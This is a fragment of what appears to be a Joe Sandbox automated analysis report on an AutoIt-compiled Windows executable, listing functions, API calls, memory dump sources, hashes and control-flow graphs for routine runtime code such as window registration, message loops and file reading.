                                                                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: IsThemeActive$uxtheme.dll
                                                                                                        • API String ID: 2574300362-3542929980
                                                                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                        Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeInfoLibraryParametersSystem
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 3403648963-3837949563
                                                                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                        Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                        • API String ID: 1762048999-758534266
                                                                                                        • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                        • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                        • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                        • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                        Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • __wcsicoll.LIBCMT ref: 00402007
                                                                                                        • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                        • __wcsicoll.LIBCMT ref: 00402033
                                                                                                          • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                        • __wcsicoll.LIBCMT ref: 00402049
                                                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                        • API String ID: 3948761352-1609664196
                                                                                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                        Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                        • String ID: Include$\
                                                                                                        • API String ID: 3173733714-3429789819
                                                                                                        • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                        • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                        Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                        • _free.LIBCMT ref: 00452A17
                                                                                                        • _free.LIBCMT ref: 00452A20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1255752989-0
                                                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                        Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                        • String ID: FILE
                                                                                                        • API String ID: 3888824918-3121273764
                                                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                        Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(0099ED78,000000FF,00000000), ref: 00410552
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                        Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0099ED78,000000FF,00000000), ref: 00410552
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                        • API String ID: 423443420-4155596026
                                                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                        Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 1579825452-753088835
                                                                                                        • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                        • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                        Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1971 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1981 40f6b4-40f6c2 1980->1981 1982 40f6af-40f6b2 1980->1982 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1991 425d11 1987->1991 1988->1975 1990->1968 1991->1984
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                        • String ID: AU3!$EA06
                                                                                                        • API String ID: 1268643489-2658333250
                                                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                        Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
